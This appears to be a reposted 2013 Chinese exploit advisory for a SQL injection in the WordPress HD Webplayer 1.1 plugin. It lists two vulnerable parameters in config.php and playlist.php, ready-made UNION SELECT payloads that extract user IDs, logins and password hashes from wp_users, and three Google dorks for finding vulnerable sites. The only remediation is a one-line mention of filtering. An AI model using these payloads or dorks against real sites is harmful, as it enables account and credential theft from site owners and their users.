选择风格

Wordpress HD Webplayer 1.1 SQL注射及修复

时间：2013/4/19 12:09:00 作者：平凡之路　来源：xuhantao.com 浏览：

标题 Wordpress HD Webplayer 1.1 SQL Injection
作者: JoinSe7en
程序官网:
软件连接:
影响版本: version 1.1
已测试系统: Windows 7, Backtrack 5 r3

+----------------------------------------------------------------------+
| 缺陷1 - config.php |
+----------------------------------------------------------------------+

# Location:

/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]

# Exploit Code:

config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
| 缺陷 2 - playlist.php |
+----------------------------------------------------------------------+

# Location:

/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]

# Exploit Code:

playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different

三个不同的搜索关键词:

# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

修复：针对性过滤

，www.xuhantao.com，涛涛电脑知识网

上一篇：创新工厂安全宝安全防护绕过漏洞

下一篇：顺丰综合管理平台服务器沦陷

没有相关文章

本类热门

本类推荐

本类固顶

暂无信息

部分内容来自网络，如有侵权请联系站长尽快处理站长QQ:965898558(广告及站内业务受理)

Wordpress HD Webplayer 1.1 SQL注射及修复

时间：2013/4/19 12:09:00 作者：平凡之路 来源：xuhantao.com 浏览：

相关文章

本类热门

本类推荐

本类固顶

时间：2013/4/19 12:09:00 作者：平凡之路　来源：xuhantao.com 浏览：